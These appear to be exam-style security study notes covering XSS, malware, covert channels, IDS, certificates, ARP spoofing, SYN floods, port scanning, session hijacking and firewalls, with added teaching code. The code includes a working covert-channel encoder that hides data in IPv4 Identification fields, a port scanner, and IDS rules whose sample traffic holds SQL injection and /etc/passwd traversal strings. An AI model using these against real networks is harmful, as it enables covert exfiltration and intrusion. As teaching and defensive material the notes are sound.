1. Cross-site scripting (XSS) attacks are a type of injection in which malicious scripts are injected into an otherwise trusted website.
2. An XSS attack occurs when an attacker uses a web application to send malicious code, usually in the form of a browser-side script, to a different end user, because the application puts untrusted input into its pages without validating or encoding it.
3. XSS is therefore a client-side code injection attack.
4. An attacker can use XSS to deliver a malicious script to an unsuspecting user, whose browser runs it with the trust it gives that site.
5. The script can read any cookies, session tokens or other sensitive information the browser holds for the site (cookies marked HttpOnly excepted) and send them to the attacker.
6. It can also rewrite the content of the HTML page, for example to insert a fake login form.
Windows security 5M
1. Security and Maintenance (earlier called Action Center, and before that Windows Security Center) is a monitoring component of the Windows NT family of operating systems.
2. It monitors the security and maintenance status of the computer.
3. That includes whether a personal firewall, anti-virus software and anti-spyware software are present, enabled and up to date.
4. It also reports the working status of Network Access Protection, Windows Update, User Account Control, Windows Error Reporting, and Backup and Restore.
5. It notifies the user of any problem with these criteria.
6. Security and Maintenance consists of three major components:
i. Control panel applet
ii. Windows service
iii. Application programming interface (API)
7. The control panel applet groups the monitored criteria into categories and colour-codes them: yellow indicates a non-critical warning and red a critical warning.
8. The service determines the current state of the settings.
9. It continually monitors the system for changes and notifies the user if it detects a problem.
10. To show notifications, it adds an icon to the Windows taskbar notification area.
11. A set of APIs lets programs retrieve, and subscribe to notifications of, the aggregate health status reported by Security and Maintenance.
12. These APIs let programs confirm whether or not the system is in a healthy state.
13. Separately, the Windows Security log (viewed in Event Viewer) records audited events such as logon and logoff activity.
14. The Security log is a tool for troubleshooting problems and for detecting and investigating attempted and successful unauthorized activity.
What are the different types of malware? How do they propagate? 10M
Types of malware:
1. Virus:
i. A virus is a malicious code that has the capability to copy itself.
ii. Viruses spread when the software or document they are attached to is transferred from one
computer to another using any device or network.
iii. Computer virus can corrupt or destroy your system.
iv. Viruses are generally destructive.
2. Worm:
i. A worm is malicious code that can spread from one computer to another on its own.
ii. Worms are specifically designed to exploit vulnerabilities, and they spread over network and Internet connections without needing a host file or any user action.
iii. The big danger a worm poses is its capability to replicate itself from system to system, consuming bandwidth and hosts as it goes.
iv. Worms are often described as a sub-class of viruses.
3. Trojan horse or Trojan:
i. A Trojan is malicious code disguised as legitimate software; unlike viruses and worms it does not replicate itself.
ii. Some Trojans are more annoying than harmful.
iii. Others cause serious damage, for example by deleting files and information stored on the system or by giving the attacker remote access to it.
iv. Pirated software downloads frequently carry Trojans.
4. Blended threat:
i. A blended threat is a more sophisticated attack.
ii. It bundles the worst aspects of viruses, worms, Trojan horses and other malicious code into a single threat.
iii. A blended threat uses server and Internet vulnerabilities to transmit and spread the attack.
iv. It harms the infected systems on the network and propagates using multiple methods at once.
5. Spyware:
i. A spyware is a type of malware that spies on you without your knowledge.
ii. It collects a variety of different types of data from your system.
iii. Different types of malware can act as spyware.
iv. There are some spyware that spy on keystrokes to steal financial data.
6. Adware:
i. Adware is a type of malware that often comes bundled with spyware.
ii. Adware is any software that displays advertising on the computer.
iii. Adware is considered less harmful than other types of malware.
iv. An example of adware is the Ask Toolbar that was bundled with Oracle's Java installer.
7. Key logger:
i. A key logger runs in the background to record every keystroke made by user.
ii. Keystrokes can include usernames, passwords, credit card numbers, and other sensitive data.
iii. Key loggers upload the recorded keystrokes to a server controlled by the attacker, where they are analysed to pick out passwords and credit card numbers.
iv. Different types of malware can act as key loggers. Employers can also install key loggers on employees' computers for monitoring purposes.
8. Botnet or Bot:
i. A bot is a program created to perform specific operations automatically; a botnet is a network of infected machines running such bots under an attacker's control.
ii. Bots act like robots: snippets of code designed to automate tasks and respond to instructions from a command-and-control server.
iii. A malicious bot is installed on a system without the user's permission.
iv. Websites can guard against bots with CAPTCHA tests that verify users as human. According to many reports, botnets currently pose the biggest threat to the Internet.
9. Rootkit:
i. A rootkit is a set of software tools that hides its presence in the lower layers of the operating system.
ii. A rootkit is a type of malware designed to burrow deep into the computer to avoid detection by security programs and users.
iii. Rootkits continually hide their presence: their files, processes and network connections.
iv. Users can protect themselves from rootkits by regularly patching vulnerabilities in software, applications and operating systems, updating virus definitions, avoiding suspicious downloads, and scanning the system from outside the running operating system (for example from boot media), where the rootkit cannot interfere.
10. Ransomware:
i. Ransomware is a type of malware that takes a computer or its data hostage in an effort to
extort money from victims.
ii. There are two types of Ransomware: Lockscreen Ransomware and Encryption Ransomware.
iii. Lockscreen Ransomware displays a full-screen image or webpage that prevents you from
accessing anything from your computer.
iv. Encryption ransomware encrypts your files with a key that only the attacker holds, so they cannot be opened without paying.
Give two techniques to establish a covert channel. 5M
Techniques to establish a covert channel:
i. Unused Header Bits
ii. Optional Header Fields
iii. Semantic Overloading of Header Fields
iv. Packet and Message Sequence Timing
v. Payload Tunneling
i. Unused header bits:
1. Protocols such as TCP/IP have reserved or unused header bits in which a covert channel can be encoded.
2. If the receiver does not check these bits, or the protocol specification does not impose explicit values on them, hidden data can be transmitted in them without affecting normal delivery.
3. The unused fields in the TCP/IP headers can thus be used to establish a hidden communication channel.
4. Malicious software agents use the unused fields of ICMP and TCP/IP packets in this way.
ii. Semantic overloading of header fields:
1. A header field that is always present and must carry a legitimate value (for example the IP Identification field, the TCP initial sequence number, or the Type of Service field) is given a second meaning: the sender chooses its value so that it also encodes hidden data.
2. Because the field still holds a syntactically valid value, the packet is processed normally by every host and device on the path.
3. A receiver that knows the scheme reads the hidden data out of the field; an observer sees only ordinary-looking traffic.
4. The channel carries only a few bits per packet, and it breaks if a device on the path rewrites the field (for example a NAT rewriting ports, or a normalising firewall).
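An added example of semantic overloading of a header field, written for this page rather than taken from it: each IPv4 header built below is a normal 20-byte header with a valid checksum, but its 16-bit Identification field, normally just a fragment-reassembly counter, is chosen to carry two bytes of a hidden message. The addresses and the message are constructed for the demonstration, and the packets are built and decoded in memory rather than sent.

```python
import socket
import struct


def ip_checksum(header: bytes) -> int:
    """One's-complement sum over 16-bit words (RFC 791). A header that
    already contains its correct checksum sums to zero."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src, dst, ident, payload_len, proto=17, ttl=64):
    """20-byte IPv4 header without options. `ident` is the only field that
    carries covert data; every other field is what a normal stack would send."""
    ver_ihl = (4 << 4) | 5
    hdr = struct.pack("!BBHHHBBH4s4s",
                      ver_ihl, 0, 20 + payload_len, ident, 0, ttl, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    csum = ip_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:]


def covert_encode(message: bytes, src="10.0.0.5", dst="10.0.0.9"):
    """Sender: two hidden bytes per packet in the Identification field. A
    length byte goes first so the receiver knows where the message ends.
    Addresses are invented for the example."""
    data = bytes([len(message)]) + message
    if len(data) % 2:
        data += b"\x00"
    packets = []
    for i in range(0, len(data), 2):
        ident = struct.unpack("!H", data[i:i + 2])[0]
        packets.append(build_ipv4_header(src, dst, ident, payload_len=0))
    return packets


def covert_decode(packets):
    """Receiver: drop packets with a bad header checksum (as any IP stack
    would) and reassemble the Identification fields."""
    raw = b""
    for pkt in packets:
        if ip_checksum(pkt[:20]) != 0:
            continue
        raw += pkt[4:6]          # bytes 4-5 of the header: Identification
    length = raw[0]
    return raw[1:1 + length]
```

The point to notice is that nothing in the packets is malformed: a firewall that validates headers passes them, and only a device that normalises or randomises the Identification field (or a detector that notices the field is not behaving like a counter) disrupts the channel.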
What is IDS? How does it differ from a honeypot? Discuss the different types of IDS.
10M
IDS:
1. IDS stands for Intrusion Detection System.
2. An IDS is a software or hardware device installed on the network (NIDS) or on a host (HIDS) to detect and report intrusion attempts against the network.
3. An IDS gathers information about unauthorized access or misuse within a LAN or on a host.
4. A network IDS is built on a packet sniffer, but unlike a plain sniffer it analyses the captured traffic against rules.
5. An IDS evaluates a suspected intrusion once it has taken place and signals an alarm.
How an IDS differs from a honeypot:
1. An IDS gathers information about unauthorized access to real systems, whereas a honeypot is a decoy system that exists only to be attacked (the name comes from the pot of honey used as an insect trap).
2. The IDS is designed to protect and monitor a live production environment, whereas the honeypot is intended to draw attackers away from production systems and into a monitored trap.
3. An IDS is a defence, whereas a honeypot is not a defence in itself.
4. An IDS will never raise the question of "entrapment", whereas a honeypot might.
5. An IDS is a tool for monitoring and reporting unauthorized system activity, whereas a honeypot is a decoy system that attracts attacks for the purpose of analysis.
Types of IDS:
Network IDS, Host IDS (HIDS), Protocol-based IDS, Application-protocol-based IDS, Anomaly-based IDS, Misuse (signature)-based IDS, Hybrid IDS.
Network-based and host-based IDS are the two general types.
i. Network-based IDS:
1. Network-based IDS is the first type of IDS.
2. It is deployed at strategic points in the network infrastructure (for example on a switch mirror port behind the firewall).
3. It captures the traffic going across the wire and compares it to a database of known attack signatures (an anomaly-based NIDS compares it to a baseline of normal traffic instead).
4. If an inspected packet matches the signature database, actions can be taken such as alerting the administrator, sending a TCP RST to the attacking host to kill the connection, or dynamically modifying firewall rules to block the connection.
5. A network IDS is essentially a sniffer with detection logic built in.
6. Examples of network IDS: Snort, Cisco network IDS appliances.
ii. Host-based IDS:
1. Host-based IDS is the second type of IDS.
2. A host IDS runs as a service or agent on the protected host.
3. It does not inspect traffic that is not directed at the host it protects; in addition to that traffic it watches local activity such as logs, file integrity and system calls.
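An added illustration (not part of the original answer) of the two detection approaches described above, in Python: a few signature rules of the kind a Snort-style NIDS matches against request content, plus a simple threshold (anomaly) rule that flags a source touching many destination ports. The traffic records are constructed for the example, in a simplified `src_ip dst_port request` form; the rule names and the threshold are the author's choices.

```python
import re
from collections import defaultdict

# Constructed sample records (not captured traffic): "src_ip dst_port request".
SAMPLE_TRAFFIC = """\
10.1.1.7 80 GET /index.html HTTP/1.1
10.1.1.7 80 GET /search?q=shoes HTTP/1.1
203.0.113.4 80 GET /login.php?user=admin'%20OR%201=1-- HTTP/1.1
203.0.113.4 80 GET /cgi-bin/../../../../etc/passwd HTTP/1.1
198.51.100.9 21 -
198.51.100.9 22 -
198.51.100.9 23 -
198.51.100.9 25 -
198.51.100.9 80 -
198.51.100.9 443 -
""".splitlines()

# Signature (misuse) rules: name -> pattern over the request text, the same idea
# as a Snort content/pcre option. Precise, but only for attacks someone has
# already written a rule for.
SIGNATURES = {
    "sqli-quote-or": re.compile(r"'(%20|\s)*or(%20|\s)+\d+=\d+", re.I),
    "dir-traversal": re.compile(r"(\.\./){2,}"),
    "etc-passwd":    re.compile(r"/etc/passwd"),
}

# Anomaly rule: one source talking to this many distinct ports is a port sweep,
# whatever the payload looks like.
PORT_SWEEP_THRESHOLD = 5


def detect(records):
    """Return (source, rule_name) alerts in the order they fire."""
    alerts = []
    ports_seen = defaultdict(set)
    for rec in records:
        src, dport, request = rec.split(" ", 2)
        for name, pattern in SIGNATURES.items():
            if pattern.search(request):
                alerts.append((src, name))
        ports_seen[src].add(dport)
        if len(ports_seen[src]) == PORT_SWEEP_THRESHOLD:   # fire once per source
            alerts.append((src, "port-sweep"))
    return alerts
```

The sweep from 198.51.100.9 carries no attack payload at all, so no signature fires on it; only the threshold rule catches it. Conversely the threshold rule says nothing about the two injection attempts from 203.0.113.4, which is why real deployments combine both.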
Explain the process of generation & verification of digital certificate. 10M
1. A digital certificate is a digital form of identification.
2. It is a credential that provides information about the identity of an entity, together with other information such as its public key.
3. It is issued by a trusted authority called a certification authority (CA).
4. It is valid only for a specific period of time.
5. The relying party knows the certificate is valid because a trusted certification authority has issued and signed it.
6. Digital certificates support public key cryptography because they bind the public key of the entity identified in the certificate to that identity.
7. They are therefore the basis of public-key-based authentication.
8. When it issues a certificate, the certification authority signs the certificate with its own private key.
9. Certificates have a standard structure (X.509) so that the information within them can be reliably retrieved and understood.
10. A digital certificate contains:
a. Version number
b. Serial number
c. Certificate algorithm identifier
d. Issuer name
e. Validity period
f. Subject name
g. Subject public key information
h. Issuer unique identifier
i. Subject unique identifier
j. Extensions
k. Certification authority's digital signature
11. Digital signature technology allows the recipient of a signed message (here, the certificate) to verify its origin and its integrity.
12. Signature verification determines whether a given message was signed by the private key that corresponds to a given public key.
13. It consists of three steps:
a. Message digest decryption
b. Digest evaluation
c. Digest comparison
14. Message digest decryption: the digest was encrypted (signed) with the issuer's private key. The recipient decrypts the signature with the issuer's public key, which it obtains from the issuer's own (CA) certificate, and so recovers the digest the issuer computed.
15. Digest evaluation: the message cannot be derived from the digest, so the recipient re-computes the digest of the received message using exactly the same hash algorithm the issuer used.
16. Digest comparison: the decrypted digest and the re-computed digest are compared. If they match, the signature is verified and the recipient can accept the message as coming unaltered from the issuer.
17. If the signature is forged, decrypting it with the public key yields a value that is not the hash of the message.
18. If the message was changed after signing, the hash computed from the changed message will differ from the original hash, because different messages produce different hash values.
19. If the public key does not correspond to the private key used for signing, the value obtained by decrypting the signature with the wrong key will not be the correct hash either.
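The three verification steps above, as an added Python example (written for this page, and not how a real CA library is used): a small X.509-like certificate body is signed with a textbook RSA key held by the CA and then verified. The CA key uses two Mersenne primes chosen for the example, the SHA-256 digest is reduced modulo the modulus instead of being padded as PKCS#1 would, and the issuer, subject and serial number are invented; a real implementation uses a library such as `cryptography` with proper padding and key sizes.

```python
import hashlib
import json

# Toy CA key pair (example only). p and q are the Mersenne primes 2^31-1 and
# 2^61-1; a real CA uses 2048-bit or larger primes generated at random.
CA_P, CA_Q = (1 << 31) - 1, (1 << 61) - 1
CA_N = CA_P * CA_Q
CA_E = 65537
CA_D = pow(CA_E, -1, (CA_P - 1) * (CA_Q - 1))   # private exponent
CA_PUBLIC_KEY = (CA_E, CA_N)


def digest(tbs: dict, n: int) -> int:
    """Canonical encoding of the to-be-signed fields, then SHA-256. Reducing
    the hash mod n keeps it inside the RSA group; real signatures pad instead."""
    data = json.dumps(tbs, sort_keys=True, separators=(",", ":")).encode()
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def issue_certificate(subject, subject_public_key, serial, not_before, not_after):
    """CA side: assemble the certificate fields and sign their digest with the
    CA private key (the field names mirror the X.509 list above)."""
    tbs = {
        "version": 3,
        "serial": serial,
        "signatureAlgorithm": "sha256-textbookRSA",
        "issuer": "CN=Example Toy CA",
        "validity": {"notBefore": not_before, "notAfter": not_after},
        "subject": subject,
        "subjectPublicKeyInfo": {"e": subject_public_key[0], "n": subject_public_key[1]},
        "extensions": {"basicConstraints": "CA:FALSE"},
    }
    signature = pow(digest(tbs, CA_N), CA_D, CA_N)
    return {"tbs": tbs, "signature": signature}


def verify_certificate(cert, ca_public_key=CA_PUBLIC_KEY) -> bool:
    """Relying-party side: the three steps from the text."""
    e, n = ca_public_key
    recovered = pow(cert["signature"], e, n)   # 1. digest decryption with the CA public key
    computed = digest(cert["tbs"], n)          # 2. digest evaluation over the received fields
    return recovered == computed               # 3. digest comparison
```

Changing any to-be-signed field after issuance (point 18) or verifying against a different CA key (point 19) makes the comparison fail, because the recovered and recomputed digests no longer agree.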
ARP spoofing:
1. ARP stands for Address Resolution Protocol; it maps IP addresses to MAC addresses on a LAN.
2. ARP spoofing is a malicious technique by which an attacker causes network traffic to be redirected to the attacker's machine.
3. It works on both wired and wireless LANs, and is usually combined with sniffing of the redirected traffic.
4. The idea is to send forged ARP replies onto the Ethernet LAN so that other hosts associate the attacker's MAC address with another host's IP address (typically the default gateway); the attacker can then read, modify or drop the traffic.
5. There are three forms of ARP spoofing attack:
a. Man-in-the-middle attack: the attacker forwards the traffic between the victim and the gateway, modifying it on the way.
b. Denial-of-service attack: a non-existent MAC address is associated with the victim's default gateway, so the victim's traffic goes nowhere.
c. Passive sniffing: the attacker's MAC address is associated with the gateway's IP address; the attacker forwards the traffic unchanged and simply records it.
6. There are useful, non-malicious uses of the same technique: hotel and other captive-portal networks use it to redirect guests' laptops to a registration page before allowing Internet access.
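An added example, not from the original answer: a passive ARP-spoofing detector in Python in the spirit of arpwatch. It builds three ARP reply frames in memory using invented addresses, parses them as a sniffer would, and alerts when a reply claims the gateway's IP address with a MAC that differs from the known binding.

```python
import socket
import struct
from collections import namedtuple

ArpReply = namedtuple("ArpReply", "sender_mac sender_ip target_mac target_ip")


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame + ARP reply (opcode 2) for IPv4 over Ethernet: 42 bytes."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + b"\x08\x06"
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)      # htype, ptype, hlen, plen, opcode
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp_reply(frame):
    """Return an ArpReply for an ARP reply frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    _, _, _, _, opcode = struct.unpack("!HHBBH", frame[14:22])
    if opcode != 2:
        return None
    smac, sip, tmac, tip = struct.unpack("!6s4s6s4s", frame[22:42])
    return ArpReply(mac_str(smac), socket.inet_ntoa(sip), mac_str(tmac), socket.inet_ntoa(tip))


class ArpWatch:
    """Passive detector: remembers the first MAC seen for each IP (or a static
    binding for critical hosts such as the gateway) and alerts when a later
    reply claims the same IP with a different MAC."""

    def __init__(self, static_bindings=None):
        self.table = dict(static_bindings or {})
        self.alerts = []

    def observe(self, frame):
        reply = parse_arp_reply(frame)
        if reply is None:
            return
        known = self.table.get(reply.sender_ip)
        if known is None:
            self.table[reply.sender_ip] = reply.sender_mac
        elif known != reply.sender_mac:
            self.alerts.append((reply.sender_ip, known, reply.sender_mac))


# Constructed frames for the demonstration (invented addresses):
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "aa:bb:cc:dd:ee:01"
VICTIM_MAC = "aa:bb:cc:dd:ee:10"
ATTACKER_MAC = "de:ad:be:ef:00:66"
SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, "192.168.1.10"),           # genuine
    build_arp_reply("aa:bb:cc:dd:ee:20", "192.168.1.20", VICTIM_MAC, "192.168.1.10"),
    build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, "192.168.1.10"),          # poisoned
]
```

A static binding for the gateway is what makes the third frame detectable on first sight; without it the detector would only notice a change relative to whichever reply it happened to see first, which is why arpwatch-style tools are usually seeded with the addresses of routers and servers.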
TCP SYN flood attack:
1. A TCP SYN flood is a type of denial-of-service attack, often launched as a distributed DoS (DDoS).
2. It exploits part of the normal TCP three-way handshake to consume resources on the targeted server and render it unresponsive.
3. The attacker sends TCP connection requests faster than the targeted machine can process them, exhausting its connection queue and possibly saturating the network.
4. In a SYN flood the attacker sends repeated SYN packets to one or more ports on the targeted server, usually with spoofed source IP addresses. The server, unaware of the attack, sees multiple apparently legitimate requests to establish communication and responds to each with a SYN-ACK from each open port.
5. The malicious client either does not send the expected ACK, or, if the source address was spoofed, never received the SYN-ACK in the first place.
6. Either way, the server holds a half-open connection and waits for the ACK for some time; once its backlog of half-open connections is full, SYNs from legitimate clients are dropped.
7. Common mitigations are SYN cookies (the server encodes the connection details in its initial sequence number instead of storing state), shorter half-open timeouts and larger backlogs, and filtering upstream of the server.
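An added simulation (not part of the original answer) of the half-open queue exhaustion described above and of the SYN-cookie defence, in Python. The `Listener` models only the server side of the handshake with a small fixed backlog and no timeouts, the attacker's spoofed addresses and the legitimate client are invented, and the cookie construction (an HMAC over the client address and port) is a simplification of the real kernel scheme.

```python
import hashlib
import hmac
import os
import random


class Listener:
    """Server side of the three-way handshake with a bounded half-open queue.
    Timeouts are omitted, which is what a flood effectively achieves: the
    queue fills faster than entries expire."""
    MASK = 0xFFFFFFFF

    def __init__(self, backlog=8, syn_cookies=False):
        self.backlog = backlog
        self.syn_cookies = syn_cookies
        self.half_open = {}        # client -> our ISN (only used without SYN cookies)
        self.established = set()
        self.dropped = 0
        self.secret = os.urandom(16)

    def _cookie(self, client):
        # SYN cookie: the ISN is a keyed hash of the client's address and port,
        # so a valid final ACK can be recognised without storing anything.
        mac = hmac.new(self.secret, ("%s:%d" % client).encode(), hashlib.sha256).digest()
        return int.from_bytes(mac[:4], "big")

    def on_syn(self, client):
        """Return the ISN we put in the SYN-ACK, or None if the SYN was dropped."""
        if self.syn_cookies:
            return self._cookie(client)
        if len(self.half_open) >= self.backlog:
            self.dropped += 1
            return None
        isn = random.getrandbits(32)
        self.half_open[client] = isn
        return isn

    def on_ack(self, client, ack_number):
        """Final ACK of the handshake; accepted only if it acknowledges our ISN."""
        expected = self._cookie(client) if self.syn_cookies else self.half_open.get(client)
        if expected is not None and ack_number == (expected + 1) & self.MASK:
            self.half_open.pop(client, None)
            self.established.add(client)
            return True
        return False


def run_flood(syn_cookies, flood_size=1000):
    """Constructed scenario: spoofed SYNs from addresses that never answer,
    then one legitimate client. Returns (client connected?, SYNs dropped)."""
    srv = Listener(backlog=8, syn_cookies=syn_cookies)
    for i in range(flood_size):
        srv.on_syn(("198.51.100.%d" % (i % 250 + 1), 1024 + i))   # SYN-ACK goes nowhere
    client = ("10.0.0.7", 50000)
    isn = srv.on_syn(client)
    if isn is not None:
        srv.on_ack(client, (isn + 1) & Listener.MASK)
    return client in srv.established, srv.dropped
```

Without cookies the first eight spoofed SYNs fill the backlog and every later SYN, the legitimate one included, is dropped; with cookies the server keeps no per-SYN state, so the flood costs it only the SYN-ACK replies and the real client still completes its handshake.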
Port scanning:
1. Systematically probing a computer's ports to learn which ones are open is called port scanning.
2. Port scanning has legitimate uses in managing networks (inventory, verifying firewall rules).
3. It can also be malicious: it is the usual first step of reconnaissance before an attack.
4. Types of port scan:
i. Vanilla: the scanner attempts to connect to all 65,535 ports.
ii. Strobe: a more focused scan looking only for known services to exploit.
iii. Fragmented packets: the scanner splits each probe across packet fragments so that simple packet filters in a firewall do not recognise it.
iv. UDP: the scanner looks for open UDP ports.
v. Sweep: the scanner connects to the same port on many machines.
vi. FTP bounce: the scanner relays its probes through an FTP server in order to disguise the source of the scan.
vii. Stealth scan: the scanner uses techniques (such as half-open SYN scans) intended to keep the scanned computer from logging the scan.
5. Port scanning is not in itself a crime, but it is usually regarded as hostile reconnaissance.
6. There is no way to stop someone from port scanning a computer that is on the Internet, because any service it offers must listen on a port, and an open port is exactly what a scanner looks for.
7. Firewalls and intrusion detection/prevention products can limit what a scanner learns and stop a scanner from doing damage to the system.
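An added example (not from the original answer) of the simplest scan type, a connect() scan, in Python. To keep it self-contained and harmless it starts its own throw-away TCP listener on an ephemeral 127.0.0.1 port and scans a small window of ports around it; the listener, the port window and the timeout are the author's choices for the demonstration.

```python
import socket
import threading


def start_dummy_service():
    """Constructed target: a TCP listener on an ephemeral 127.0.0.1 port so the
    scan has something real to find without touching any remote host.
    Returns (listening socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listening socket closed: stop
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def connect_scan(host, ports, timeout=0.2):
    """Vanilla connect() scan: completes the full three-way handshake on each
    port. Loud (every probe shows up as an accepted connection in the target's
    logs), but it needs no raw-socket privileges."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except (ConnectionRefusedError, socket.timeout, OSError):
                continue             # closed (RST) or filtered (no answer)
            open_ports.append(port)
    return open_ports


def demo(width=3):
    """Scan a small window of ports around the dummy service.
    Returns (open ports found, port the service was listening on)."""
    srv, port = start_dummy_service()
    try:
        return connect_scan("127.0.0.1", range(port - width, port + width + 1)), port
    finally:
        srv.close()
```

A closed port answers with a RST (the `ConnectionRefusedError` branch) and a filtered one answers with nothing (the timeout branch); a stealth SYN scan makes the same distinction from the SYN-ACK or RST alone, without ever completing the handshake, which is why it needs raw sockets and does not appear in application logs.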
What is session hijacking? How does it occur? Give two ways to prevent a session hijack. 10M
1. The session hijacking attack exploits the web session control mechanism, which is managed through a session token.
2. A session token is a string of variable width carried in the URL, in a cookie, in a hidden form field, etc.
3. The attack compromises the session token by stealing or predicting a valid token, and uses it to gain unauthorized access to the web server as the legitimate user.
4. The session token could be compromised in different ways:
i. Predictable session token
ii. Session Sniffing
iii. Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc)
iv. Man-in-the-middle attack
v. Man-in-the-browser attack
5. Session hijacking can be done in two levels:
I. Network Level
II. Application Level
I. Network level:
Network-level hijacking involves TCP and UDP sessions.
A. TCP session hijacking:
1. TCP hijacking intercepts an already established TCP session between two communicating parties; the attacker then pretends to be one of them and redirects the TCP traffic to itself by injecting spoofed IP packets, so that the attacker's commands are processed as if they came from the authenticated host.
2. It desynchronises the session between the real parties by inserting the attacker between them.
3. Authentication is only required when the connection is established.
4. An already established connection can therefore be stolen without going through any authentication or other security measure.
5. TCP session hijacking can be carried out in three ways:
i. Man-in-the-middle attack
ii. Blind attack
iii. IP spoofing
i. Man-in-the-middle attack: the attacker uses a packet sniffer to intercept the communication between client and server, and so learns the sequence numbers needed to inject packets.
ii. Blind attack: the attacker cannot sniff the packets and must guess the sequence number the server expects.
iii. IP spoofing: a computer outside the network pretends to be a trusted computer within it by forging the source IP address of its packets.
B. UDP session hijacking:
1. UDP does not use sequence numbers or synchronisation.
2. A UDP session is therefore easier to hijack than a TCP session.
3. The hijacker simply has to forge a server reply to a client UDP request before the real server can respond.
4. If sniffing is used it is easier still: the attacker sees the request as it is sent and can race, or suppress, the server's reply.
II. Application level:
1. Application-level session hijacking targets HTTP sessions.
2. At this level a hijacker can not only take over existing sessions.
3. The hijacker can also create new sessions from the stolen data.
4. HTTP session hijacking:
i. HTTP session hijacking involves obtaining the session ID of the session.
ii. The session ID is the only unique identifier of the HTTP session.
iii. Session IDs are found in three places: in the URL of an HTTP GET request, in a cookie stored on the client's computer, or in a hidden form field.
Methods to prevent session hijacking:
1. Regenerate the session ID after a successful login: this prevents session fixation, because the attacker does not know the session ID the user has after logging in.
2. Use a long random number or string as the session key: this reduces the risk that an attacker could guess a valid session key by trial and error or brute force.
3. Encrypt the data passed between the parties (TLS/HTTPS for the whole session): this is relied upon by web-based e-commerce services because it prevents sniffing-style attacks; marking the session cookie Secure and HttpOnly keeps it off plain HTTP and away from page scripts. Some services additionally check the identity of the user during the session, for example that the source IP address or browser has not changed.
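An added Python example (not part of the original answer) of the preventions above: a deliberately weak session store whose counter-based IDs an attacker can guess, beside a hardened store that issues 256-bit random IDs, regenerates the ID on login so that a fixated or sniffed pre-login ID is worthless, and sets the cookie attributes that go with TLS. The store interface and the user names are invented for the demonstration.

```python
import itertools
import secrets


class WeakSessionStore:
    """Predictable tokens: a counter. Seeing one ID lets an attacker guess the
    next (and previous) ones, the "predictable session token" case above."""
    _counter = itertools.count(1000)

    def __init__(self):
        self.sessions = {}

    def new_session(self):
        sid = str(next(self._counter))
        self.sessions[sid] = {"user": None}
        return sid


def guess_neighbour(observed_sid):
    """Attacker's guess of the next ID the weak store will issue."""
    return str(int(observed_sid) + 1)


class SessionStore:
    """Hardened store: long random IDs, regenerated when the session gains privilege."""

    def __init__(self):
        self.sessions = {}

    def new_session(self):
        sid = secrets.token_urlsafe(32)      # 256 bits from the OS CSPRNG: not guessable
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid, user):
        # Regenerate on login: an ID the attacker planted (fixation) or sniffed
        # before authentication never becomes an authenticated session.
        data = self.sessions.pop(sid, None)
        if data is None:
            raise KeyError("unknown session")
        new_sid = secrets.token_urlsafe(32)
        self.sessions[new_sid] = {"user": user}
        return new_sid

    def user_for(self, sid):
        return self.sessions.get(sid, {}).get("user")

    def cookie_header(self, sid):
        # Transport-side controls from point 3: sent only over TLS, not readable
        # by page scripts (blunts XSS theft), not sent on cross-site requests.
        return "Set-Cookie: session=%s; Secure; HttpOnly; SameSite=Strict; Path=/" % sid
```

After `login()` the old ID no longer maps to anyone, so an attacker who planted it before the victim logged in holds nothing; the replacement is 43 characters of URL-safe base64, far beyond what trial and error can cover.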
What is firewall? Explain different types of firewalls and specify at which layer of the
Internet stack do they operate. 10M
Firewall:
1. A firewall is a system that provides network security by filtering incoming and outgoing network traffic based on a set of user-defined rules.
2. It may be hardware, software or both, and it functions in a networked environment to block unauthorized access while permitting authorized communications.
3. Its purpose is to reduce or eliminate unwanted network communications while allowing all legitimate communication to flow freely.
4. A firewall performs actual enforcement actions such as blocking and filtering.
5. It restricts access to your network by deciding which packets to allow.
6. In most server infrastructures, firewalls provide an essential layer of security that, combined with other measures, prevents attackers from reaching your servers in malicious ways.
Types of firewall (with the layer of the Internet stack at which each operates):
Packet filtering firewall, stateful inspection firewall, Network Address Translation (NAT) firewall, application-based firewall, hybrid firewall.
A. Packet filtering firewall (network and transport layers, OSI layers 3-4):
i. Packet filtering firewalls inspect each packet in isolation.
ii. They are also called stateless firewalls.
iii. They are unaware of connection state.
iv. They can only allow or deny packets based on the individual packet's headers (IP addresses, protocol, port numbers, TCP flags).
B. Stateful inspection firewall (layers 3-4 with a connection table; some also parse selected application protocols such as FTP to track their data connections):
i. A stateful firewall determines the connection state that packets belong to.
ii. This makes it much more flexible than a stateless firewall: it can, for example, admit reply traffic only for connections that were opened from inside.
iii. It works by tracking related packets until the connection state can be determined, and then applying the firewall rules to the traffic as a whole.
C. Network Address Translation (NAT) firewall (network layer, layer 3, usually rewriting layer-4 ports as well):
i. NAT is the process in which a network device or firewall assigns a public address to a computer or group of computers in a private network.
ii. Its main use is to limit the number of public IP addresses an organisation or company must use, for both economy and security: inside hosts are not directly reachable from outside.
